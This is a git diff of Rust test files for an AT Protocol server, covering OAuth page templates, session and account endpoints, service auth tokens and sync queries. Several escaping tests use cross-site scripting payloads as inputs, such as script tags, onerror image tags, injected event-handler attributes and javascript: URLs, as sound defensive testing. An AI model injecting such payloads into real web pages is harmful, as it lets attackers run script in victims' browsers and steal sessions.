!html.contains("<script>"),
|
||||
"Script tags in error should be escaped"
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_oauth_template_xss_escaping_login_hint() {
|
||||
let malicious_hint = "\" onfocus=\"alert('xss')\" autofocus=\"";
|
||||
let html = login_page(
|
||||
"client123",
|
||||
None,
|
||||
None,
|
||||
"test-uri",
|
||||
None,
|
||||
Some(malicious_hint),
|
||||
);
|
||||
assert!(
|
||||
!html.contains("onfocus=\"alert"),
|
||||
"Event handlers should be escaped in login hint"
|
||||
);
|
||||
assert!(html.contains("""), "Quotes should be escaped");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_oauth_template_xss_escaping_request_uri() {
|
||||
let malicious_uri = "\" onmouseover=\"alert('xss')\"";
|
||||
let html = login_page("client123", None, None, malicious_uri, None, None);
|
||||
assert!(
|
||||
!html.contains("onmouseover=\"alert"),
|
||||
"Event handlers should be escaped in request_uri"
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_oauth_error_page_xss_escaping() {
|
||||
let malicious_error = "<script>steal()</script>";
|
||||
let malicious_desc = "<img src=x onerror=evil()>";
|
||||
let html = error_page(malicious_error, Some(malicious_desc));
|
||||
assert!(
|
||||
!html.contains("<script>"),
|
||||
"Script tags should be escaped in error page"
|
||||
);
|
||||
assert!(
|
||||
!html.contains("<img "),
|
||||
"IMG tags should be escaped in error page"
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_oauth_success_page_xss_escaping() {
|
||||
let malicious_name = "<script>steal_session()</script>";
|
||||
let html = success_page(Some(malicious_name));
|
||||
assert!(
|
||||
!html.contains("<script>"),
|
||||
"Script tags should be escaped in success page"
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_oauth_template_no_javascript_urls() {
|
||||
let html = login_page("client123", None, None, "test-uri", None, None);
|
||||
assert!(
|
||||
!html.contains("javascript:"),
|
||||
"Login page should not contain javascript: URLs"
|
||||
);
|
||||
let error_html = error_page("test_error", None);
|
||||
assert!(
|
||||
!error_html.contains("javascript:"),
|
||||
"Error page should not contain javascript: URLs"
|
||||
);
|
||||
let success_html = success_page(None);
|
||||
assert!(
|
||||
!success_html.contains("javascript:"),
|
||||
"Success page should not contain javascript: URLs"
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_oauth_template_form_action_safe() {
|
||||
let malicious_uri = "javascript:alert('xss')//";
|
||||
let html = login_page("client123", None, None, malicious_uri, None, None);
|
||||
assert!(
|
||||
html.contains("action=\"/oauth/authorize\""),
|
||||
"Form action should be fixed URL"
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_send_error_types_have_display() {
|
||||
fn test_send_error_display() {
|
||||
let timeout = SendError::Timeout;
|
||||
let max_retries = SendError::MaxRetriesExceeded("test".to_string());
|
||||
let invalid_recipient = SendError::InvalidRecipient("bad recipient".to_string());
|
||||
assert!(!format!("{}", timeout).is_empty());
|
||||
assert!(!format!("{}", max_retries).is_empty());
|
||||
assert!(!format!("{}", invalid_recipient).is_empty());
|
||||
}
|
||||
assert!(format!("{}", timeout).to_lowercase().contains("timeout"));
|
||||
|
||||
#[test]
|
||||
fn test_send_error_timeout_message() {
|
||||
let error = SendError::Timeout;
|
||||
let msg = format!("{}", error);
|
||||
assert!(
|
||||
msg.to_lowercase().contains("timeout"),
|
||||
"Timeout error should mention timeout"
|
||||
);
|
||||
}
|
||||
let max_retries = SendError::MaxRetriesExceeded("Server returned 503".to_string());
|
||||
let msg = format!("{}", max_retries);
|
||||
assert!(!msg.is_empty());
|
||||
assert!(msg.contains("503") || msg.contains("retries"));
|
||||
|
||||
#[test]
|
||||
fn test_send_error_max_retries_includes_detail() {
|
||||
let error = SendError::MaxRetriesExceeded("Server returned 503".to_string());
|
||||
let msg = format!("{}", error);
|
||||
assert!(
|
||||
msg.contains("503") || msg.contains("retries"),
|
||||
"MaxRetriesExceeded should include context"
|
||||
);
|
||||
let invalid = SendError::InvalidRecipient("bad recipient".to_string());
|
||||
assert!(!format!("{}", invalid).is_empty());
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_check_signup_queue_accepts_session_jwt() {
|
||||
async fn test_signup_queue_authentication() {
|
||||
use common::{base_url, client, create_account_and_login};
|
||||
let base = base_url().await;
|
||||
let http_client = client();
|
||||
|
||||
let res = http_client.get(format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base))
|
||||
.send().await.unwrap();
|
||||
assert_eq!(res.status(), reqwest::StatusCode::OK);
|
||||
let body: serde_json::Value = res.json().await.unwrap();
|
||||
assert_eq!(body["activated"], true);
|
||||
|
||||
let (token, _did) = create_account_and_login(&http_client).await;
|
||||
let res = http_client
|
||||
.get(format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base))
|
||||
let res = http_client.get(format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base))
|
||||
.header("Authorization", format!("Bearer {}", token))
|
||||
.send()
|
||||
.await
|
||||
.unwrap();
|
||||
assert_eq!(
|
||||
res.status(),
|
||||
reqwest::StatusCode::OK,
|
||||
"Session JWTs should be accepted"
|
||||
);
|
||||
.send().await.unwrap();
|
||||
assert_eq!(res.status(), reqwest::StatusCode::OK);
|
||||
let body: serde_json::Value = res.json().await.unwrap();
|
||||
assert_eq!(body["activated"], true);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_check_signup_queue_no_auth() {
|
||||
use common::{base_url, client};
|
||||
let base = base_url().await;
|
||||
let http_client = client();
|
||||
let res = http_client
|
||||
.get(format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base))
|
||||
.send()
|
||||
.await
|
||||
.unwrap();
|
||||
assert_eq!(res.status(), reqwest::StatusCode::OK, "No auth should work");
|
||||
let body: serde_json::Value = res.json().await.unwrap();
|
||||
assert_eq!(body["activated"], true);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_html_escape_ampersand() {
|
||||
let html = login_page("client&test", None, None, "test-uri", None, None);
|
||||
assert!(html.contains("&"), "Ampersand should be escaped");
|
||||
assert!(
|
||||
!html.contains("client&test"),
|
||||
"Raw ampersand should not appear in output"
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_html_escape_quotes() {
|
||||
let html = login_page("client\"test'more", None, None, "test-uri", None, None);
|
||||
assert!(
|
||||
html.contains(""") || html.contains("""),
|
||||
"Double quotes should be escaped"
|
||||
);
|
||||
assert!(
|
||||
html.contains("'") || html.contains("'"),
|
||||
"Single quotes should be escaped"
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_html_escape_angle_brackets() {
|
||||
let html = login_page("client<test>more", None, None, "test-uri", None, None);
|
||||
assert!(html.contains("<"), "Less than should be escaped");
|
||||
assert!(html.contains(">"), "Greater than should be escaped");
|
||||
assert!(
|
||||
!html.contains("<test>"),
|
||||
"Raw angle brackets should not appear"
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_oauth_template_preserves_safe_content() {
|
||||
let html = login_page(
|
||||
"my-safe-client",
|
||||
Some("My Safe App"),
|
||||
Some("read write"),
|
||||
"valid-uri",
|
||||
None,
|
||||
Some("user@example.com"),
|
||||
);
|
||||
assert!(
|
||||
html.contains("my-safe-client") || html.contains("My Safe App"),
|
||||
"Safe content should be preserved"
|
||||
);
|
||||
assert!(
|
||||
html.contains("read write") || html.contains("read"),
|
||||
"Scope should be preserved"
|
||||
);
|
||||
assert!(
|
||||
html.contains("user@example.com"),
|
||||
"Login hint should be preserved"
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_csrf_like_input_value_protection() {
|
||||
let malicious = "\" onclick=\"alert('csrf')";
|
||||
let html = login_page("client", None, None, malicious, None, None);
|
||||
assert!(
|
||||
!html.contains("onclick=\"alert"),
|
||||
"Event handlers should not be executable"
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_unicode_handling_in_templates() {
|
||||
let unicode_client = "客户端 クライアント";
|
||||
let html = login_page(unicode_client, None, None, "test-uri", None, None);
|
||||
assert!(
|
||||
html.contains("客户端") || html.contains("&#"),
|
||||
"Unicode should be preserved or encoded"
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_null_byte_in_input() {
|
||||
let with_null = "client\0id";
|
||||
let sanitized = sanitize_header_value(with_null);
|
||||
assert!(
|
||||
sanitized.contains("client"),
|
||||
"Content before null should be preserved"
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_very_long_input_handling() {
|
||||
let long_input = "x".repeat(10000);
|
||||
let sanitized = sanitize_header_value(&long_input);
|
||||
assert!(
|
||||
!sanitized.is_empty(),
|
||||
"Long input should still produce output"
|
||||
);
|
||||
}
|
||||
|
||||
426
tests/server.rs
426
tests/server.rs
@@ -6,384 +6,118 @@ use reqwest::StatusCode;
|
||||
use serde_json::{Value, json};
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_health() {
|
||||
async fn test_server_basics() {
|
||||
let client = client();
|
||||
let res = client
|
||||
.get(format!("{}/health", base_url().await))
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to send request");
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
assert_eq!(res.text().await.unwrap(), "OK");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_describe_server() {
|
||||
let client = client();
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.server.describeServer",
|
||||
base_url().await
|
||||
))
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to send request");
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
let body: Value = res.json().await.expect("Response was not valid JSON");
|
||||
let base = base_url().await;
|
||||
let health = client.get(format!("{}/health", base)).send().await.unwrap();
|
||||
assert_eq!(health.status(), StatusCode::OK);
|
||||
assert_eq!(health.text().await.unwrap(), "OK");
|
||||
let describe = client.get(format!("{}/xrpc/com.atproto.server.describeServer", base)).send().await.unwrap();
|
||||
assert_eq!(describe.status(), StatusCode::OK);
|
||||
let body: Value = describe.json().await.unwrap();
|
||||
assert!(body.get("availableUserDomains").is_some());
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_create_session() {
|
||||
async fn test_account_and_session_lifecycle() {
|
||||
let client = client();
|
||||
let base = base_url().await;
|
||||
let handle = format!("user_{}", uuid::Uuid::new_v4());
|
||||
let payload = json!({
|
||||
"handle": handle,
|
||||
"email": format!("{}@example.com", handle),
|
||||
"password": "password"
|
||||
});
|
||||
let create_res = client
|
||||
.post(format!(
|
||||
"{}/xrpc/com.atproto.server.createAccount",
|
||||
base_url().await
|
||||
))
|
||||
.json(&payload)
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to create account");
|
||||
let payload = json!({ "handle": handle, "email": format!("{}@example.com", handle), "password": "password" });
|
||||
let create_res = client.post(format!("{}/xrpc/com.atproto.server.createAccount", base))
|
||||
.json(&payload).send().await.unwrap();
|
||||
assert_eq!(create_res.status(), StatusCode::OK);
|
||||
let create_body: Value = create_res.json().await.unwrap();
|
||||
let did = create_body["did"].as_str().unwrap();
|
||||
let _ = verify_new_account(&client, did).await;
|
||||
let payload = json!({
|
||||
"identifier": handle,
|
||||
"password": "password"
|
||||
});
|
||||
let res = client
|
||||
.post(format!(
|
||||
"{}/xrpc/com.atproto.server.createSession",
|
||||
base_url().await
|
||||
))
|
||||
.json(&payload)
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to send request");
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
let body: Value = res.json().await.expect("Response was not valid JSON");
|
||||
assert!(body.get("accessJwt").is_some());
|
||||
let login = client.post(format!("{}/xrpc/com.atproto.server.createSession", base))
|
||||
.json(&json!({ "identifier": handle, "password": "password" })).send().await.unwrap();
|
||||
assert_eq!(login.status(), StatusCode::OK);
|
||||
let login_body: Value = login.json().await.unwrap();
|
||||
let access_jwt = login_body["accessJwt"].as_str().unwrap().to_string();
|
||||
let refresh_jwt = login_body["refreshJwt"].as_str().unwrap().to_string();
|
||||
let refresh = client.post(format!("{}/xrpc/com.atproto.server.refreshSession", base))
|
||||
.bearer_auth(&refresh_jwt).send().await.unwrap();
|
||||
assert_eq!(refresh.status(), StatusCode::OK);
|
||||
let refresh_body: Value = refresh.json().await.unwrap();
|
||||
assert!(refresh_body["accessJwt"].as_str().is_some());
|
||||
assert_ne!(refresh_body["accessJwt"].as_str().unwrap(), access_jwt);
|
||||
assert_ne!(refresh_body["refreshJwt"].as_str().unwrap(), refresh_jwt);
|
||||
let missing_id = client.post(format!("{}/xrpc/com.atproto.server.createSession", base))
|
||||
.json(&json!({ "password": "password" })).send().await.unwrap();
|
||||
assert!(missing_id.status() == StatusCode::BAD_REQUEST || missing_id.status() == StatusCode::UNPROCESSABLE_ENTITY);
|
||||
let invalid_handle = client.post(format!("{}/xrpc/com.atproto.server.createAccount", base))
|
||||
.json(&json!({ "handle": "invalid!handle.com", "email": "test@example.com", "password": "password" }))
|
||||
.send().await.unwrap();
|
||||
assert_eq!(invalid_handle.status(), StatusCode::BAD_REQUEST);
|
||||
let unauth_session = client.get(format!("{}/xrpc/com.atproto.server.getSession", base))
|
||||
.bearer_auth(AUTH_TOKEN).send().await.unwrap();
|
||||
assert_eq!(unauth_session.status(), StatusCode::UNAUTHORIZED);
|
||||
let delete_session = client.post(format!("{}/xrpc/com.atproto.server.deleteSession", base))
|
||||
.bearer_auth(AUTH_TOKEN).send().await.unwrap();
|
||||
assert_eq!(delete_session.status(), StatusCode::UNAUTHORIZED);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_create_session_missing_identifier() {
|
||||
let client = client();
|
||||
let payload = json!({
|
||||
"password": "password"
|
||||
});
|
||||
let res = client
|
||||
.post(format!(
|
||||
"{}/xrpc/com.atproto.server.createSession",
|
||||
base_url().await
|
||||
))
|
||||
.json(&payload)
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to send request");
|
||||
assert!(
|
||||
res.status() == StatusCode::BAD_REQUEST || res.status() == StatusCode::UNPROCESSABLE_ENTITY,
|
||||
"Expected 400 or 422 for missing identifier, got {}",
|
||||
res.status()
|
||||
);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_create_account_invalid_handle() {
|
||||
let client = client();
|
||||
let payload = json!({
|
||||
"handle": "invalid!handle.com",
|
||||
"email": "test@example.com",
|
||||
"password": "password"
|
||||
});
|
||||
let res = client
|
||||
.post(format!(
|
||||
"{}/xrpc/com.atproto.server.createAccount",
|
||||
base_url().await
|
||||
))
|
||||
.json(&payload)
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to send request");
|
||||
assert_eq!(
|
||||
res.status(),
|
||||
StatusCode::BAD_REQUEST,
|
||||
"Expected 400 for invalid handle chars"
|
||||
);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_session() {
|
||||
let client = client();
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.server.getSession",
|
||||
base_url().await
|
||||
))
|
||||
.bearer_auth(AUTH_TOKEN)
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to send request");
|
||||
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_refresh_session() {
|
||||
let client = client();
|
||||
let handle = format!("refresh_user_{}", uuid::Uuid::new_v4());
|
||||
let payload = json!({
|
||||
"handle": handle,
|
||||
"email": format!("{}@example.com", handle),
|
||||
"password": "password"
|
||||
});
|
||||
let create_res = client
|
||||
.post(format!(
|
||||
"{}/xrpc/com.atproto.server.createAccount",
|
||||
base_url().await
|
||||
))
|
||||
.json(&payload)
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to create account");
|
||||
assert_eq!(create_res.status(), StatusCode::OK);
|
||||
let create_body: Value = create_res.json().await.unwrap();
|
||||
let did = create_body["did"].as_str().unwrap();
|
||||
let _ = verify_new_account(&client, did).await;
|
||||
let login_payload = json!({
|
||||
"identifier": handle,
|
||||
"password": "password"
|
||||
});
|
||||
let res = client
|
||||
.post(format!(
|
||||
"{}/xrpc/com.atproto.server.createSession",
|
||||
base_url().await
|
||||
))
|
||||
.json(&login_payload)
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to login");
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
let body: Value = res.json().await.expect("Invalid JSON");
|
||||
let refresh_jwt = body["refreshJwt"]
|
||||
.as_str()
|
||||
.expect("No refreshJwt")
|
||||
.to_string();
|
||||
let access_jwt = body["accessJwt"]
|
||||
.as_str()
|
||||
.expect("No accessJwt")
|
||||
.to_string();
|
||||
let res = client
|
||||
.post(format!(
|
||||
"{}/xrpc/com.atproto.server.refreshSession",
|
||||
base_url().await
|
||||
))
|
||||
.bearer_auth(&refresh_jwt)
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to refresh");
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
let body: Value = res.json().await.expect("Invalid JSON");
|
||||
assert!(body["accessJwt"].as_str().is_some());
|
||||
assert!(body["refreshJwt"].as_str().is_some());
|
||||
assert_ne!(body["accessJwt"].as_str().unwrap(), access_jwt);
|
||||
assert_ne!(body["refreshJwt"].as_str().unwrap(), refresh_jwt);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_delete_session() {
|
||||
let client = client();
|
||||
let res = client
|
||||
.post(format!(
|
||||
"{}/xrpc/com.atproto.server.deleteSession",
|
||||
base_url().await
|
||||
))
|
||||
.bearer_auth(AUTH_TOKEN)
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to send request");
|
||||
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_service_auth_success() {
|
||||
async fn test_service_auth() {
|
||||
let client = client();
|
||||
let base = base_url().await;
|
||||
let (access_jwt, did) = create_account_and_login(&client).await;
|
||||
let params = [("aud", "did:web:example.com")];
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.server.getServiceAuth",
|
||||
base_url().await
|
||||
))
|
||||
.bearer_auth(&access_jwt)
|
||||
.query(¶ms)
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to send request");
|
||||
let res = client.get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base))
|
||||
.bearer_auth(&access_jwt).query(&[("aud", "did:web:example.com")]).send().await.unwrap();
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
let body: Value = res.json().await.expect("Response was not valid JSON");
|
||||
assert!(body["token"].is_string());
|
||||
let body: Value = res.json().await.unwrap();
|
||||
let token = body["token"].as_str().unwrap();
|
||||
let parts: Vec<&str> = token.split('.').collect();
|
||||
assert_eq!(parts.len(), 3, "Token should be a valid JWT");
|
||||
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
|
||||
let payload_bytes = URL_SAFE_NO_PAD.decode(parts[1]).expect("payload b64");
|
||||
let claims: Value = serde_json::from_slice(&payload_bytes).expect("payload json");
|
||||
let payload_bytes = URL_SAFE_NO_PAD.decode(parts[1]).unwrap();
|
||||
let claims: Value = serde_json::from_slice(&payload_bytes).unwrap();
|
||||
assert_eq!(claims["iss"], did);
|
||||
assert_eq!(claims["sub"], did);
|
||||
assert_eq!(claims["aud"], "did:web:example.com");
|
||||
let lxm_res = client.get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base))
|
||||
.bearer_auth(&access_jwt).query(&[("aud", "did:web:example.com"), ("lxm", "com.atproto.repo.getRecord")])
|
||||
.send().await.unwrap();
|
||||
assert_eq!(lxm_res.status(), StatusCode::OK);
|
||||
let lxm_body: Value = lxm_res.json().await.unwrap();
|
||||
let lxm_token = lxm_body["token"].as_str().unwrap();
|
||||
let lxm_parts: Vec<&str> = lxm_token.split('.').collect();
|
||||
let lxm_payload = URL_SAFE_NO_PAD.decode(lxm_parts[1]).unwrap();
|
||||
let lxm_claims: Value = serde_json::from_slice(&lxm_payload).unwrap();
|
||||
assert_eq!(lxm_claims["lxm"], "com.atproto.repo.getRecord");
|
||||
let unauth = client.get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base))
|
||||
.query(&[("aud", "did:web:example.com")]).send().await.unwrap();
|
||||
assert_eq!(unauth.status(), StatusCode::UNAUTHORIZED);
|
||||
let missing_aud = client.get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base))
|
||||
.bearer_auth(&access_jwt).send().await.unwrap();
|
||||
assert_eq!(missing_aud.status(), StatusCode::BAD_REQUEST);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_service_auth_with_lxm() {
|
||||
let client = client();
|
||||
let (access_jwt, did) = create_account_and_login(&client).await;
|
||||
let params = [
|
||||
("aud", "did:web:example.com"),
|
||||
("lxm", "com.atproto.repo.getRecord"),
|
||||
];
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.server.getServiceAuth",
|
||||
base_url().await
|
||||
))
|
||||
.bearer_auth(&access_jwt)
|
||||
.query(¶ms)
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to send request");
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
let body: Value = res.json().await.expect("Response was not valid JSON");
|
||||
use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD};
|
||||
let token = body["token"].as_str().unwrap();
|
||||
let parts: Vec<&str> = token.split('.').collect();
|
||||
let payload_bytes = URL_SAFE_NO_PAD.decode(parts[1]).expect("payload b64");
|
||||
let claims: Value = serde_json::from_slice(&payload_bytes).expect("payload json");
|
||||
assert_eq!(claims["iss"], did);
|
||||
assert_eq!(claims["lxm"], "com.atproto.repo.getRecord");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_service_auth_no_auth() {
|
||||
let client = client();
|
||||
let params = [("aud", "did:web:example.com")];
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.server.getServiceAuth",
|
||||
base_url().await
|
||||
))
|
||||
.query(¶ms)
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to send request");
|
||||
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
|
||||
let body: Value = res.json().await.expect("Response was not valid JSON");
|
||||
assert_eq!(body["error"], "AuthenticationRequired");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_service_auth_missing_aud() {
|
||||
async fn test_account_status_and_activation() {
|
||||
let client = client();
|
||||
let base = base_url().await;
|
||||
let (access_jwt, _) = create_account_and_login(&client).await;
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.server.getServiceAuth",
|
||||
base_url().await
|
||||
))
|
||||
.bearer_auth(&access_jwt)
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to send request");
|
||||
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_check_account_status_success() {
|
||||
let client = client();
|
||||
let (access_jwt, _) = create_account_and_login(&client).await;
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.server.checkAccountStatus",
|
||||
base_url().await
|
||||
))
|
||||
.bearer_auth(&access_jwt)
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to send request");
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
let body: Value = res.json().await.expect("Response was not valid JSON");
|
||||
let status = client.get(format!("{}/xrpc/com.atproto.server.checkAccountStatus", base))
|
||||
.bearer_auth(&access_jwt).send().await.unwrap();
|
||||
assert_eq!(status.status(), StatusCode::OK);
|
||||
let body: Value = status.json().await.unwrap();
|
||||
assert_eq!(body["activated"], true);
|
||||
assert_eq!(body["validDid"], true);
|
||||
assert!(body["repoCommit"].is_string());
|
||||
assert!(body["repoRev"].is_string());
|
||||
assert!(body["indexedRecords"].is_number());
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_check_account_status_no_auth() {
|
||||
let client = client();
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.server.checkAccountStatus",
|
||||
base_url().await
|
||||
))
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to send request");
|
||||
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
|
||||
let body: Value = res.json().await.expect("Response was not valid JSON");
|
||||
assert_eq!(body["error"], "AuthenticationRequired");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_activate_account_success() {
|
||||
let client = client();
|
||||
let (access_jwt, _) = create_account_and_login(&client).await;
|
||||
let res = client
|
||||
.post(format!(
|
||||
"{}/xrpc/com.atproto.server.activateAccount",
|
||||
base_url().await
|
||||
))
|
||||
.bearer_auth(&access_jwt)
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to send request");
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_activate_account_no_auth() {
|
||||
let client = client();
|
||||
let res = client
|
||||
.post(format!(
|
||||
"{}/xrpc/com.atproto.server.activateAccount",
|
||||
base_url().await
|
||||
))
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to send request");
|
||||
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_deactivate_account_success() {
|
||||
let client = client();
|
||||
let (access_jwt, _) = create_account_and_login(&client).await;
|
||||
let res = client
|
||||
.post(format!(
|
||||
"{}/xrpc/com.atproto.server.deactivateAccount",
|
||||
base_url().await
|
||||
))
|
||||
.bearer_auth(&access_jwt)
|
||||
.json(&json!({}))
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to send request");
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
let unauth_status = client.get(format!("{}/xrpc/com.atproto.server.checkAccountStatus", base))
|
||||
.send().await.unwrap();
|
||||
assert_eq!(unauth_status.status(), StatusCode::UNAUTHORIZED);
|
||||
let activate = client.post(format!("{}/xrpc/com.atproto.server.activateAccount", base))
|
||||
.bearer_auth(&access_jwt).send().await.unwrap();
|
||||
assert_eq!(activate.status(), StatusCode::OK);
|
||||
let unauth_activate = client.post(format!("{}/xrpc/com.atproto.server.activateAccount", base))
|
||||
.send().await.unwrap();
|
||||
assert_eq!(unauth_activate.status(), StatusCode::UNAUTHORIZED);
|
||||
let deactivate = client.post(format!("{}/xrpc/com.atproto.server.deactivateAccount", base))
|
||||
.bearer_auth(&access_jwt).json(&json!({})).send().await.unwrap();
|
||||
assert_eq!(deactivate.status(), StatusCode::OK);
|
||||
}
|
||||
|
||||
@@ -6,285 +6,103 @@ use reqwest::StatusCode;
|
||||
use serde_json::Value;
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_head_success() {
|
||||
async fn test_get_head_comprehensive() {
|
||||
let client = client();
|
||||
let (did, _jwt) = setup_new_user("gethead-success").await;
|
||||
let (did, jwt) = setup_new_user("gethead").await;
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.sync.getHead",
|
||||
base_url().await
|
||||
))
|
||||
.get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await))
|
||||
.query(&[("did", did.as_str())])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to send request");
|
||||
.send().await.expect("Failed to send request");
|
||||
assert_eq!(res.status(), StatusCode::OK);
|
||||
let body: Value = res.json().await.expect("Response was not valid JSON");
|
||||
assert!(body["root"].is_string());
|
||||
let root = body["root"].as_str().unwrap();
|
||||
assert!(root.starts_with("bafy"), "Root CID should be a CID");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_head_not_found() {
|
||||
let client = client();
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.sync.getHead",
|
||||
base_url().await
|
||||
))
|
||||
.query(&[("did", "did:plc:nonexistent12345")])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to send request");
|
||||
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
|
||||
let body: Value = res.json().await.expect("Response was not valid JSON");
|
||||
assert_eq!(body["error"], "HeadNotFound");
|
||||
assert!(
|
||||
body["message"]
|
||||
.as_str()
|
||||
.unwrap()
|
||||
.contains("Could not find root")
|
||||
);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_head_missing_param() {
|
||||
let client = client();
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.sync.getHead",
|
||||
base_url().await
|
||||
))
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to send request");
|
||||
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_head_empty_did() {
|
||||
let client = client();
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.sync.getHead",
|
||||
base_url().await
|
||||
))
|
||||
.query(&[("did", "")])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to send request");
|
||||
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
|
||||
let body: Value = res.json().await.expect("Response was not valid JSON");
|
||||
assert_eq!(body["error"], "InvalidRequest");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn test_get_head_whitespace_did() {
|
||||
let client = client();
|
||||
let res = client
|
||||
.get(format!(
|
||||
"{}/xrpc/com.atproto.sync.getHead",
|
||||
base_url().await
|
||||
))
|
||||
.query(&[("did", " ")])
|
||||
.send()
|
||||
.await
|
||||
.expect("Failed to send request");
|
||||
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
|
||||
}
|
